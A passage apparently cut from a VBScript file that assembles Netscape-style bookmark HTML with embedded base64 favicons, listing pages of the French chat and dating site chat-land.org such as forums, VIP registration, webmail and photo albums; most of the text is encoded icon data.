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AAAAAAAAAAAAAu5uPAolqYairgnTXyKKUvNCwo5/Qt6uB1b2zbtO7sU7MtaofAAAAAAAAAACWiod7WkQ7/fv28f/9+/n/2MK7IQAAAAChkIg2RTMv4O3d0f//9OL//+TP//3Yw//hxLhJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHRfWb2UdWr///////37+//ZxLwxAAAAAKmYkS5EMy/Y5dLH///66///79r/+NvH/+DHvSYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSwrsPc0xB8MGjmP///////vz7/9zIv0MAAAAAsKCYJ0Q0MNHfyb3///3x///14P/028f24cvCEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADBp5sBw6uhCLqjmhivmZEqpZOLPo12cXV1Sj//4M3F/////////f3/3ce9WQAAAAC2p58hRzc0y9W8rv///u////Pe/+3SwdsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuJiOBL2knhanj4g6jHNtXnJaVYZfSkanSTMvwkIpI9RNMCjoYUI4+KKAc//y6OT////////+/f/dxrxqAAAAALuspB1JOjbHy6+f///55v/+6tb/4sKywgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK6TjR5CJyHjNhwW+T0hGv9NLyX/dFJF/5d0Zf/BopL/38a4//jq4f/++/b////+/////f////3////+/9i+snwAAAAAv7CpF0o8OMG/nIz/++XQ/+7Lt/zXtaiTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApImBLU4pHv+dcmL/z6CO/+O2pP/z1ML/++jV///35f///fH///73///++f////n////4////+f////n/176xhgAAAADTw7oGlIaBabOPgs3auaufz7CmZ820qikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACcgHg5WjMn/9OhkP/0xLL/+8+8///byP//5dL///Dd///35P///Oz//vrp//vz5P/169z77t/S4+jTxMvRt6tlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJV5cUJeNyr/zp6N/+69q//4yrf//9XC///gzP/94c3/89zJ/+TOvPTcw7PT2L2vltS6r2nUv7U5z7qxIdPCugcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjG9mRmg/M//CkX//1aWU+NKllOXNpZXHyaaYqr6cj3XCpptEzrmvEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjgXQSmnpwrrSTh5W8nJJctpSGPL+ilR3Jr6MJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPAD///wAA//8AAAA/AAAAPwAAAD8AAAA/AAAAPwAAAH8AHwB/AB8AfwAfAP8APwD/ADMA/wAzAP8AMwD/ACMA/wBjAP8AYwD/AEEA/wDBAf4AwQH+AMEB///BAf//gQH/8AED/wABA/4AAQP+AAED/gAB//4AAf/+AH///gP///"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$SYUbW1"">Chat-Land Forums</A>" & vbCrLf &_
"<DD>This is a discussion forum." & vbCrLf &_
"<DT><A HREF=""http://medecine.chat-land.org/index.php/Accueil"" ADD_DATE=""1227117391"" LAST_CHARSET=""UTF-8"" ID=""rdf:#$TYUbW1"">Accueil - Encyclopedie Chat-land</A>" & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/vip/top.php"" ADD_DATE=""1227117563"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$UYUbW1"">Chat-Land - Top Miss et Mister</A>" & vbCrLf &_
"<DD>Inscription chat gratuit, tchat, rencontre et amour avec votre premier site de tchat et de rencontre gratuit" & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/topliste/"" ADD_DATE=""1227117610"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$VYUbW1"">Liens partenaires de tchat, chat, rencontres, dialogue et discussion directe</A>" & vbCrLf &_
"<DD>Trouvez les meilleurs sites de tchat et de rencontres gratuit, chat-land votre partenaire de tchat" & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/photos/"" ADD_DATE=""1227117656"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$WYUbW1"">Chat-Land VIP - Album Photos</A>" & vbCrLf &_
"<DD>Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) ?Facile Rapide Gratuit Sympa sans inscription!" & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/vip/find.php"" ADD_DATE=""1227117680"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$XYUbW1"">Chat-Land - Recherche VIP</A>" & vbCrLf &_
"<DD>Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) Facile Rapide Gratuit Sympa sans inscription!" & vbCrLf &_
"<DT><A HREF=""http://webmail.chat-land.org/"" ADD_DATE=""1227117709"" LAST_CHARSET=""UTF-8"" ID=""rdf:#$YYUbW1"">CHAT-LAND mail</A>" & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/ticket/"" ADD_DATE=""1227117735"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$ZYUbW1"">Chat-Land - Ticket Gagnant</A>" & vbCrLf &_
"<DD>ticket,gagnant,argent,cash,gagner des sous" & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/vip/register.php"" ADD_DATE=""1227117868"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$4Upgt2"">Chat-land VIP - Créer un accès VIP au tchat - VIP- Inscription tchat</A>" & vbCrLf &_
"<DD>Inscription chat gratuit, tchat, rencontre et amour avec votre premier site de tchat et de rencontre gratuit " & vbCrLf &_
"<DT><A HREF=""http://www.chat-land.org/vip/premium2/authentification.php"" ADD_DATE=""1227117899"" LAST_VISIT=""1227172812"" ICON=""data:image/x-icon;base64,AAABAAEAMDAAAAEAIACoJQAAFgAAACgAAAAwAAAAYAAAAAEAIAAAAAAAgCUAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAA